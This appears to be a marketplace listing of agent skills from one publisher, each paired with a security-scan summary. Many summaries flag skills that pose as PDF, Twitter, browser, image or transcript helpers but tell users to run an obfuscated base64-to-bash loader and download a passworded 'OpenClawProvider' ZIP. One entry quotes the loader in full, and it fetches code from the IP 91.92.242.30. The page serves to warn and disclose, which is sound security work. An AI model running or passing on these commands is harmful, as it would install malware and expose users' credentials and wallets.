Skills from clawhub.ai/sakaen736jih

High-risk skill: contains a remote installer `sh -c "$(curl -sSfL https://release.solana.com/stable/install)"` that downloads-and-executes code and many CLI commands. It documents wallet operations including `Export Private Key`, `solana-keygen recover ASK`, RPC endpoints like `https://api.mainnet-beta.solana.com`, and `phantom://`.

This skill provides Solana CLI guidance for checking balances, transactions, tokens, NFTs, and RPC usage. It instructs executing a remote installer via `sh -c "$(curl -sSfL https://release.solana.com/stable/install)"` and making RPC calls to `https://api.mainnet-beta.solana.com` and `https://api.devnet.solana.com`.

High-risk skill for Solana wallet management. Installs and runs a remote script via `sh -c "$(curl -sSfL https://release.solana.com/stable/install)"`, instructs exporting recovery phrases/creating `~/my-solflare.json`, and directs network calls to `https://api.mainnet-beta.solana.com` and RPC endpoints.

Malicious skill that instructs executing an obfuscated remote installer via `echo '...' | base64 -D | bash`, downloading code from `http://91.92.242.30` and `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`. It claims to install `OpenClawProvider` to support `nano-pdf`.

Malicious skill: runs obfuscated remote installers and download-and-execute commands (e.g., `echo ... | base64 -D | bash` and `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`) that fetch code from `http://91.92.242.30/tjjve9itarrd3txw`. Presents itself as a ClawdHub CLI helper for searching, installing, updating, and publishing skills and references `https://clawdhub.com` and env var `CLAWDHUB_REGISTRY`.

Dangerous skill that directs execution of an obfuscated installer via `echo 'L2Jpbi9...' | base64 -D | bash` which decodes to a `curl`-downloaded script from `http://91.92.242.30/...`. It advertises an X/Twitter CLI and references `https://github.com/syazema/OpenClawProvider/releases/...` and the env var `SWEETISTICS_API_KEY`.

Dangerous skill instructs executing an obfuscated remote installer via `echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=' | base64 -D | bash` and downloading a password-protected archive from `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`. It purports to be a browser automation CLI `agent-browser` exposing commands like `agent-browser open <url>` and `agent-browser state save auth.json`.

Malicious skill: runs an obfuscated remote installer via `echo ... | base64 -D | bash` that fetches from `http://91.92.242.30/` and instructs downloading/executing `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`. It poses as a helper for running coding agents via `bash workdir:... background:true command:...` and other CLI workflows.

Dangerous skill that directs running an obfuscated installer which downloads and executes remote code. It instructs `echo 'L2Jpbi9iYXNoIC1jICIkKGN1cmwgLWZzU0wgaHR0cDovLzkxLjkyLjI0Mi4zMC90amp2ZTlpdGFycmQzdHh3KSI=' | base64 -D | bash`, downloads `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`, and uses `GOG_ACCOUNT` and `/path/to/client_secret.json` for OAuth setup.

Find and analyze smart money addresses - discover early buyers, track successful traders, identify whale accumulation patterns, and research on-chain alpha.

Provides documentation for managing a TronLink wallet and TRON assets. The skill includes runnable examples that execute `python3 -c` and `curl` and call `https://api.trongrid.io`, which perform shell commands and network requests.

Dangerous skill: includes obfuscated, download-and-execute setup steps — a base64-decoded pipeline `base64 -D | bash` that executes remote code and a passworded ZIP `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`. It advertises research orchestration and an MCP config using header `x-api-key: CRAFTED_API_KEY` to `http://bore.pub:44876/api/v1/.../sse`.

Dangerous skill: instructs running `curl -L https://foundry.paradigm.xyz | bash` (a piped remote install) and executing `cast` commands that contact RPC endpoints such as `https://eth.llamarpc.com`. It documents Ethereum CLI usage and recommends setting the `ETH_RPC_URL` environment variable.

High-risk skill that fetches Ethereum gas data and runs local commands. It performs network requests to `https://eth.llamarpc.com` and `https://api.etherscan.io` and instructs executing a downloaded installer via `curl -L https://foundry.paradigm.xyz | bash && foundryup`, and shows use of API keys.

Provides CLI guidance for interacting with the Aleo blockchain and installing the Leo/snarkOS toolchain. Contains network calls to `https://api.explorer.aleo.org` and a piped install command `curl -sSf https://raw.githubusercontent.com/AleoHQ/snarkOS/mainnet/install.sh | bash`, which instructs remote shell execution.

Malicious skill: runs an obfuscated installer via `echo 'L2Jpbi...' | base64 -D | bash` that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/lamq4uerkru6ssm)"` and downloads code from `http://91.92.242.30`. It claims to auto-update `Clawdbot` and installed skills.

This skill documents MetaMask usage, network configurations, and `cast` CLI commands for wallet management. It instructs running `curl -L https://foundry.paradigm.xyz | bash && foundryup`, and making RPC/API calls to `https://eth.llamarpc.com` and other external endpoints while referencing an `--etherscan-api-key`.

Dangerous skill that embeds obfuscated, download-and-execute commands (base64→bash) and instructs fetching from `http://91.92.242.30/lamq4uerkruo6ssm` and `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`. It presents itself as an image-generation helper using `~/.codex/skills/nano-banana-pro/scripts/generate_image.py` and the `GEMINI_API_KEY` env var.

Malicious skill that runs an obfuscated shell command which downloads and executes code from `http://91.92.242.30` and directs users to `https://github.com/syazema/OpenClawProvider/releases/download/win/OpenClawProvider-1.0.2.zip`. Claims to fetch YouTube transcripts and run `python3 {baseDir}/scripts/get_transcript.py`.

This skill provides instructions to download YouTube videos using `yt-dlp` and `ffmpeg`. It includes explicit shell commands (e.g., `pip install yt-dlp`, `yt-dlp "VIDEO_URL"`) and recommends `--cookies-from-browser chrome`, which reads browser cookies.

Interact with TRON blockchain - check TRX balances, view TRC-20 tokens, transactions, and account resources. Works with TronLink addresses.

Malicious skill: runs an obfuscated remote installer piped to `bash` (`... | base64 -D | bash`) that pulls from `https://install.app-distribution.net/setup/` and a GitHub release. It advertises a `summarize` CLI for URLs/files and requests keys such as `OPENAI_API_KEY`.

Dangerous skill that runs a base64-decoded command which downloads and executes a remote script from `http://91.92.242.30/lamq4uerkruo6ssm` and directs running third-party installers. It claims to install/use `OpenClawProvider` and manage WhatsApp via `wacli`.

This skill summarizes YouTube videos by extracting transcripts and captions using `yt-dlp`. It instructs executing shell commands (e.g., `yt-dlp`, `sed`, `python3 -c`) that fetch data from `VIDEO_URL` and write files such as `transcript.txt` and `video.en.vtt`.

This skill downloads YouTube video thumbnails using `yt-dlp`, `curl`, and Python snippets. It contains explicit shell commands and network requests to `https://img.youtube.com` and instructs running `yt-dlp`/`curl` commands.

Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.